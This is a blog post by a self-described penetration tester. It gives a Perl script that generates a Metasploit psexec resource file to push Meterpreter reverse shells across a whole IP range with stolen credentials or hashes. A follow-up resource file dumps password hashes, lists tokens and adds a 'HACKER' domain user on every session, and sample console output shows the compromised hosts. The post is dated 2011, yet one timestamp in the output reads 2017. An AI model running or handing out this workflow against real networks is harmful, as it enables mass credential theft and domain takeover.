Thursday, September 22, 2011

Automating the Hack. From Exploit to Domain Admin, Complete Enterprise P0wnage.

I admit it. I'm a script kiddie. I love them. I'm always on the lookout for ways to automate the mundane tasks in a penetration test and for my inaugural blog post I thought I would share a combination of Metasploit scripts I use to eviscerate networks on a large scale. These post-exploitation tools will make short work of controlling as many targets as possible and leverage work by Joshua “Jabra” Abraha and Carlos Perez (darkoperator).

The first script automates Metasploit's psexec module. Once I've obtained a credential or a hash, this script attempts to upload a Meterpreter shell on to every Windows machine in an IP range. The second script allows you to run a resource file against all previously established sessions.

This post assumes you have a working knowledge of Metasploit and you're running it off of BackTrack. You'll need to prep your environment and setup your Metasploit with the required multi_meter_resource.rb file which you can download from here:
https://github.com/darkoperator/Meterpreter-Scripts/blob/89d04cae10b8a351e8c2ba1b60a38f53fe3ef3ed/post/multi/manage/multi_post_resource.rb

Save to /pentest/exploits/framework3/modules/post/multi/manage/multi_post_resource.rb

You will need to create your own post exploitation resource file. I use something like the following:
--------
all sysinfo
all run hashdump
all route
all use incognito
all list_tokens -u
all add_user HACKER Asdf1234! -h DOMAIN-CONTROLLER-IP
--------
Save as /pentest/exploits/framework3/scripts/resource/go.rc


After you've compromised a target with your favorite exploit and pulled a hashdump or obtained a credential through ARP poisoning or some other method, you're ready to automate the psexec attack. The Metasploit psexec module uses a valid administrator username and password or password hash to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals.


First create a perl file that can be compiled into an MSF resource file.


--------
#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser USERNAME\n";
print "set SMBPass PASSWORD OR HASH\n";
#As Necessary "set SMBDomain DOMAIN-NAME\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST xxx.xxx.xxx.xxx\n";
print "set LPORT 4567\n";
# first range

foreach(1.. 254) {
    print "set RHOST xxx.xxx.xxx.$_\n";
    print "exploit -z\n";
    print "sleep 1\n";
}
--------


Save as /root/psexec.pl


In a command prompt execute:
perl psexec.pl > psexec.rc


Then launch your attack:
msfconsole -r psexec.rc


p0wn for fun and profit (Example):

resource (psexec.rc)> set RHOST xxx.xxx.xxx.194
RHOST => xxx.xxx.xxx.194
resource (psexec.rc)> exploit -z
[*] Started reverse handler on xxx.xxx.xxx.188:4412
[*] Connecting to the server...
[*] Authenticating to xxx.xxx.xxx.194:445|WORKGROUP as user 'USERNAME'...
[*] Uploading payload...
[*] Created \oFMiBmQi.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xxx.xxx.xxx.194[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (hABdqAhk -"MhdWnoVdJaQBUUPAlKFZdgpIloQlkB")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \oFMiBmQi.exe...
[*] Sending stage (752128 bytes) to xxx.xxx.xxx.194
[*] Meterpreter session 14 opened (xxx.xxx.xxx.188:4412 -> xxx.xxx.xxx.194:1191) at Wed Aug 24 15:11:16 -0700 2017
[*] Session 14 created in the background.

Allow the script to finish executing against your target ranges and then review the results:

msf  exploit(psexec) > sessions

Active sessions
===============

  Id  Type                   Information                          Connection
  --  ----                   -----------                          ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ HDMORE-DT3  xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.14:54347
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DHOLZER-DT        xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.104:54033
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ RBOWS-LT2     xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.105:51174
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JGROSMAN-DT        xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.107:58424
  6   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JMCRAY-DT     xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.116:60363
  8   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ BKREB2-DT       xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.123:55074
  9   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ARAHMAN-DT2    xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.127:59479
  10  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JSTEELE-LT2    xxx.xxx.xxx.188:4488 -> xxx.xxx.xxx.147:59553

Then load DarkOperator's multi_post_resource.rb module:
msf  exploit(psexec) > use post/multi/manage/multi_post_resource.rb

Then load your resource file:
msf  auxiliary(multi-rc) > set resource /pentest/exploits/framework3/scripts/resource/go.rc

Start the fun!
msf  auxiliary(multi-rc) > run

(Example Output)
[+] Running command sysinfo against sessions 1
System Language : en_US
OS              : Windows 7 (Build 7600).
Computer        : JSTEELE-LT2
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32
[+] Running command sysinfo against sessions 2
System Language : en_US
OS              : Windows 7 (Build 7600).
Computer        : JMCRAY-LT3
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32
[+] Running command sysinfo against sessions 3
System Language : en_US
OS              : Windows 7 (Build 7601, Service Pack 1).
Computer        : HDMORE-LT
Architecture    : x86
Meterpreter     : x86/win32

This will loop through your entire list of sessions, dump sysinfo, hashes, routes, etc and attempt to add a user to the domain.


For further information:
http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash
http://www.darkoperator.com/blog/2011/7/13/automating-post-modules-and-meterpreter-across-sessions.html